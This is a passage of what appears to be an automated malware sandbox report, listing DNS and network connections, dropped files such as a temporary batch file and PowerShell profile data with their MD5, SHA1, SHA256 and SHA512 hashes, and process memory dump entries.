US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 92.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 45.19.74.20.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\2BB3.tmp\2BB4.tmp\2BB5.bat

MD5 71d06b71522b0ecd9e42ee36b73a8976
SHA1 5615791d6e861b721e9945d55a0946f4e51d0302
SHA256 5b1d0b4d9ecf50cf067defa7f05ce89792285435c5280c5dd104ed8e99877eb0
SHA512 f284e776cf2bafac627f44813bbc7325d6a692f0244aca29f0a1eb426047f53c4767142fe347861fddad7ab79bfee04917eb96f0213adce2b1d8ad37929add84

memory/880-2-0x00007FFE70A13000-0x00007FFE70A15000-memory.dmp

memory/880-8-0x000001E129E20000-0x000001E129E42000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k31353zv.nsi.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/880-13-0x00007FFE70A10000-0x00007FFE714D1000-memory.dmp

memory/880-14-0x00007FFE70A10000-0x00007FFE714D1000-memory.dmp

memory/880-17-0x00007FFE70A10000-0x00007FFE714D1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d3235ed022a42ec4338123ab87144afa
SHA1 5058608bc0deb720a585a2304a8f7cf63a50a315
SHA256 10663f5a1cb0afe5578f61ebaae2aafb363544e47b48521f9c23be9e6e431b27
SHA512 236761b7c68feca8bd62cba90cff0b25fac5613837aaa5d29ae823ace8b06a2057553cf7e72b11ccc59b6c289e471ca1bbac1a880aef5e2868875371a17c1abf

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7e855de5861571374efc63dacc84638b
SHA1 54bc201ab83ab18ef4c8009b307ae7c6d041369e
SHA256 aaef6c1145f7994603ccc9477b801b498e77401e1a9e0e0e1e6a585c74fe7a2a
SHA512 db1e4028123b5991525d386d13b20011259e58db8cee4662714d6fe1b2ef48816f0fa2f8e36da3713a8aedb04cbaccf778aa4015cd2475b4371450cea73745bb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6317adf4fbc43ea2fd68861fafd57155
SHA1 6b87c718893c83c6eed2767e8d9cbc6443e31913
SHA256 c1ead17eef37b4b461cedc276504a441489e819c7f943037f2001966aeec90af
SHA512 17229aae8622e4bfc3caaac55684f7d4ccd3162af5919c851b1d8ac4060b6bb7b75044ecee116523d05acb55197dcb60780958f629450edef386f1e6f65f49f0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 58b80fe8da7d23cd3c9707f4ce93457e
SHA1 7d1c58b992631d82cabd38d738ccca072c91c124
SHA256 4479db3e2faf952801a1506140f3612e267e9bb4f5d509b0d63204429de8eef3
SHA512 82ef5d29aaf46b5fef467185193f03612058c4bbd7b9926293a79c18deefe137811f95dc59feaa649376c8711ca3253177177b538d2d953147db1ed719cba5e8

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1ff7c767b41e57bd6662b9b45b7e4331
SHA1 e484ee08429d6403c5beb97582f2bc88567d2d45
SHA256 c37e94da3e67f9473d2f0f51725c4246eefdbd2c01b3603d1b218842afc05048
SHA512 310cdae4625b1c391eab4adc7e139da6da6cbc2f8eda386ec6aa23da7967fe3dad6792ccd4bed0a0a320c466363051927ff376487080f77b50bf325098651483

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ba169f4dcbbf147fe78ef0061a95e83b
SHA1 92a571a6eef49fff666e0f62a3545bcd1cdcda67
SHA256 5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1
SHA512 8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

memory/1896-85-0x000002047D1D0000-0x000002047D3EC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c58a75389f1ab258652c47081e1ddb5a
SHA1 d95f18dd3174cd5452b278aa2c7e5394567e32a8
SHA256 3e2f43d6dbf3177dc0c46fce82fc23ec2d694f09cae9c44761b901bdf5f725bf
SHA512 b928fb48a51e56d2554584c9275f0fd70f1c751b725c7f054a8049268e6a31a2357cf9f77671f69fb5a781e0b12a70324ee844660fcfa5b4a3a44d74f12aee6a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 da5c82b0e070047f7377042d08093ff4
SHA1 89d05987cd60828cca516c5c40c18935c35e8bd3
SHA256 77a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5
SHA512 7360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b

memory/2084-108-0x0000012CFCA40000-0x0000012CFCC5C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3996d8b0c44a2fdabdabbfaffda948c5
SHA1 30b099e2995c339c2a6abfa727258235feb817b6
SHA256 70b3dceb0039e84d5ab7fc7f5757ece6e6a6acb593eb0f95e979da80ec454101
SHA512 0fe9e6f96b4417d94c966d6e65f129520f3ccd3359e6e831e29b654f2d90ed09dec45947be94ed3e59109783d8e01ddf2035593609f2d8dc41104644ab107dd7

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 34f595487e6bfd1d11c7de88ee50356a
SHA1 4caad088c15766cc0fa1f42009260e9a02f953bb
SHA256 0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d
SHA512 10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

memory/4444-153-0x000001CE2D410000-0x000001CE2D62C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1bcffb21fd74d59b3233b56b614eb133
SHA1 654c816ff08d2b47e574a8ac87c2e89d909f78eb
SHA256 96b1a17c2b8bf7d3e52466259d86310231885632e12a55ecdcb8b15b722725db
SHA512 c8dc82344f039010d0ddee4045d8e3752726c335c5dfadd2f8af316db89c27be892b762baad2ce0d2b4480f84b999e5ec174d0286d08c4000e3c106d7d506cfb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b2600662b39ee59512f530131c038b45
SHA1 c417eecbd7fd9c0f143261279c17cdc83783c95c
SHA256 b2cd3884c706629b0e92856ba2643c4062d98480d38a36e4ac10f6a6695ed8c2
SHA512 97bbb9a0859b3e01a5d789b5d242c07b35e8f80a7ccf7e2e9af1ff31cf0a3497cc23603754407140a7602bb1a3edd7ec71529a0b9a7460b700ebcd72306bd3af

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5c964bb22371323b8064895892ab211e
SHA1 a23e9564b96d7a3e8b4a90abd0c7993d87e314fe
SHA256 80229da91bb7b07ea68d18e5a89a54988520c314030b252bd0e14584bbb0669f
SHA512 dd32dc25e1150fe04d0dde6677d3a555cd7c0428faf2ad071e4bb7e434c808c6c17186e55867330f78f528009b74e511644f1278815551c3e19b37532151f1c8

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7511c81925750deb7ad1b9b80eea8a8d
SHA1 6ea759b3cbd243ae11435c6d6c5ced185eb01f49
SHA256 5b49723a7773f2fe1f6093236e7b9b2c546f0873635d02346cb39535811234fa
SHA512 5f7e69316d39525d137a7a833f8c746ceef8f1b2295348393fb3244cca8b962fbaad0f7da49da453fe97e2c49b1f41f06138111ac5ff97fdc33c300350ec3a1b